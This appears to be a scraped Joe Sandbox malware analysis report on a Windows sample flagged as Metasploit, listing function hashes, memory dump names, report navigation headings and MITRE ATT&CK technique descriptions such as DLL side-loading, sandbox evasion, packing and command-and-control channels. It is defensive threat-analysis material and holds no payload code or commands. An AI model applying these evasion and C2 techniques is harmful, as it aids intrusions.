Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4e0ad9198eb5c1b284a6f80c5c862e243cbbb5c467be9c188b8dc755b78a15e
Instruction ID: 8d9b7f51adfe17281d33351e5bd71aa19983913d49cc1454ae8e100fb7e94daf
Opcode Fuzzy Hash: a4e0ad9198eb5c1b284a6f80c5c862e243cbbb5c467be9c188b8dc755b78a15e
Instruction Fuzzy Hash: C3F0F475905344ABC7209E2CD885CE7BBBDEEC7318B10556AD5C87B252C7209806C6A8

Function 00408680 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb9967b8556e794a9bd5e9e2a12564930d7f2ea8e6b4b7565bfd44721fc0540c
Instruction ID: 60d4b24447f7b6db8eba9a70e2ece41cf9972fb0edf89557d6f7cd30f95d2c67
Opcode Fuzzy Hash: eb9967b8556e794a9bd5e9e2a12564930d7f2ea8e6b4b7565bfd44721fc0540c
Instruction Fuzzy Hash: 720149343052005BC704EF38DC868B9B764DB8631170404BFED81DF397F93168158755

Function 004067C3 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 998537bebf3df387600a4f5ce979183f4faa302e6148d20c62b78e20c66a059d
Instruction ID: 54e5996617a3696a73d93199fbd6d979a88b765fae2e81e01a6bf4a73d12fb57
Opcode Fuzzy Hash: 998537bebf3df387600a4f5ce979183f4faa302e6148d20c62b78e20c66a059d
Instruction Fuzzy Hash: 2DF0F4756047646FCA26DE15CC85F47FB79FF8B704B40044DF2847B282C674A800CBA8

Function 004056F0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7bba05c9be66f63acd2d053c66d9af438cf0f59c943dccb46faad187e40003e
Instruction ID: 012a05fdb79da3ba267b4d97f6a7705f8dda8a7538b40e7117cdab0935253095
Opcode Fuzzy Hash: a7bba05c9be66f63acd2d053c66d9af438cf0f59c943dccb46faad187e40003e
Instruction Fuzzy Hash: 8CE08679D023486BC7118D68D481473FB79EE9B215F146555AD847B706C335D801C7A8

Function 00403D4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 00403D6B

Strings

4d (longest request), xrefs: 00403D58
set_create failed, xrefs: 00403D65

Memory Dump Source

Source File: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240185882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240215008.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240228698.000000000040D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DRVf7H9j4V.jbxd

Yara matches

Similarity

API ID: fprintf
String ID: 4d (longest request)$set_create failed
API String ID: 383729395-678042608
Opcode ID: e3d3552cbd16f34401e802826dc6a2e5690c2284a07ca8e29708c3f171f6230e
Instruction ID: dbbaa142c143b26e99e35478be6cea228a70e21e9318d155f1f20dd67b8751d0
Opcode Fuzzy Hash: e3d3552cbd16f34401e802826dc6a2e5690c2284a07ca8e29708c3f171f6230e
Instruction Fuzzy Hash: CCD023B39440007BD100E7EC6C46A2437C466081157410372F808F22D1C432505C862D

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DRVf7H9j4V.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Metasploit

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Windows Analysis Report
DRVf7H9j4V.exe

Function 00690095 Relevance: 1.6, APIs: 1, Instructions: 125
libraryCOMMON

Function 00690105 Relevance: 6.2, APIs: 4, Instructions: 154
networksleepCOMMON

Function 006901AA Relevance: 4.6, APIs: 3, Instructions: 56
networksleepCOMMON

Function 00690225 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Function 0040140F Relevance: 1.3, APIs: 1, Instructions: 71
COMMON

Function 00401390 Relevance: 1.3, APIs: 1, Instructions: 26
memoryCOMMON

Function 0040139A Relevance: 1.3, APIs: 1, Instructions: 24
memoryCOMMON

Function 004013E4 Relevance: 1.3, APIs: 1, Instructions: 20
memoryCOMMON

Function 004013FE Relevance: 1.3, APIs: 1, Instructions: 11
memoryCOMMON

Function 0040A430 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119
COMMON

Function 00403D4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16
COMMON